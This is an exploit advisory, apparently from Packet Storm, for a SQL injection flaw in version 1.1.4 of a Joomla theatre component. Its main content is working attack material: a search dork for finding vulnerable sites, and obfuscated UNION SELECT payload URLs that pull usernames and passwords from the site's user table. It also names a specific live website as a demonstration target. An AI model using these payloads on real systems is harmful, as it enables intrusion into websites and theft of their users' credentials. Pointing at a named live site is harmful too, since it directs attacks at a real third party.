Joomla Threate component version 1.1.4 suffers from a remote SQL injection vulnerability.
d19753038452b7e8446673cb7af106c669f760838e9c7a6383ec97568aaaae93######################
# Exploit Title : Joomla com_threate 1.1.4 SQL injection
# Exploit Author : xBADGIRL21
# Dork : index.php?option=com_threate
# version: 1.1.4
# Vendor Homepage : http://joomlic.com/
# Tested on: [ Windows ]
# skype:xbadgirl21
# Date: 2016/07/09
# video Proof : https://youtu.be/WXqrK7dqGaY
######################
# PoC:
# [id=] Get Parameter Vulnerable To SQL
#
# http://server/index.php?option=com_theatre&view=show&id=[SQLi]
#
# Demo
# http://server/index.php?option=com_theatre&view=show&id=36'
#
# http://server/index.php?option=com_theatre&view=show&id=-36
/*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
#
# http://server/index.php?option=com_theatre&view=show&id=-36
/*!12345union*/ select
1,2,3,4,5,6,7,8,9,10,/*!12345group_coNcat(username,0x3a,password)*/,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43
from aur_users--
#
# Live Demo :
# https://www.auroratheatre.org/
#
######################
# Discovered by : xBADGIRL21
# Greetz : All Mauritanien Hackers - NoWhere
#######################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed